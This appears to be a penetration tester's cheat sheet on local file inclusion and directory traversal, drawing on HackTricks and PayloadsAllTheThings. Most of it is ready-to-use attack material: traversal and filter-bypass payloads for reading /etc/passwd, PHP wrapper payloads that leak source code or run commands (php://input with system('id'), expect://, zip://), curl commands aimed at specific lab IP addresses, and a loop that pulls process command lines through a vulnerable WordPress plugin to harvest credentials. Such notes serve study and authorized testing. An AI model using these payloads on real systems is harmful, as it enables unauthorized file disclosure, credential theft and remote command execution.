File Inclusion / Directory Traversal

Hacktricks

PayloadAllTheThings

Blog The Proc File System

Tool secondtool

LFI

 file:///../../../etc/passwd
 /etc/passwd on Linux or C:\Windows\boot.ini on Windows
 #if input from parameters used as part of filenames
 we can bypass by adding /../ in the
  
 # if Blacklisting is not coded correctly
 ..././ and ....// would become ../ vice vers sa
 cat .?/.*/.?/etc/passwd.
 Bash allows for for the ? and * wildcards to be used as wildcard
 
 #On PHP versions 5.3.4 and earlier, string-based detection could be bypassed by URL encoding the payload. 
 The characters ../ can be URL encoded into %2e%2e%2f, which will bypass the filter.

PHP provides various wrappers, which can be used for easier access to files, protocols, or streams. A list of wrappers can be found here. The php:// wrapper is enabled by default and interacts with IO streams.

PHP filter to convert file contents to Base64

 php://filter/read=convert.base64-encode/resource=/etc/passwd
 #we can get the source code and decode it
 curl http://134.209.184.216:32391/extension/index.php?language=php://filter/read=convert.base64-encode/resource=config

PHP filter to convert file contents to ROT13

php://filter/read=string.rot13/resource=/etc/passwd

Command execution with PHP Expect wrapper

expect://id

Using PHP Input wrapper for command execution

curl -s -X POST --data "<?php system('id'); ?>" "http://134.209.184.216:30084/index.php?language=php://input"

Command execution with the PHP Zip wrapper

zip://malicious.zip%23exec.php&cmd=id

The Proc File System

$ for i in `seq 1 10000`; do curl -s --output - http://$RHOST/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline | grep -oaE 'cmdline.*?<script>' | sed "s/cmdline\/proc\/$i\/cmdline\/proc\/$i\/cmdline//" | sed "s/<script>//" | grep -avE '^$'; done

Directory	Description
/proc/sched_debug	This is usually enabled on newer systems, such as RHEL 6. It provides information as to what process is running on which cpu. This can be handy to get a list of processes and their PID number.
/proc/mounts	Provides a list of mounted file systems. Can be used to determine where other interesting files might be located
/proc/net/arp	Shows the ARP table. This is one way to find out IP addresses for other internal servers.
/proc/net/route	Shows the routing table information.
/proc/net/tcp and /proc/net/udp	Provides a list of active connections. Can be used to determine what ports are listening on the server
/proc/net/fib_trie	This is used for route caching. This can also be used to determine local IPs, as well as gain a better understanding of the target’s networking structure
/proc/version	Shows the kernel version. This can be used to help determine the OS running and the last time it’s been fully updated.

Directory	Description
/proc/[PID]/cmdline	Lists everything that was used to invoke the process. This sometimes contains useful paths to configuration files as well as usernames and passwords.
/proc/[PID]/environ	Lists all the environment variables that were set when the process was invoked. This also sometimes contains useful paths to configuration files as well as usernames and passwords.
/proc/[PID]/cwd	Points to the current working directory of the process. This may be useful if you don’t know the absolute path to a configuration file.
/proc/[PID]/fd/[#]	Provides access to the file descriptors being used. In some cases this can be used to read files that are opened by a process.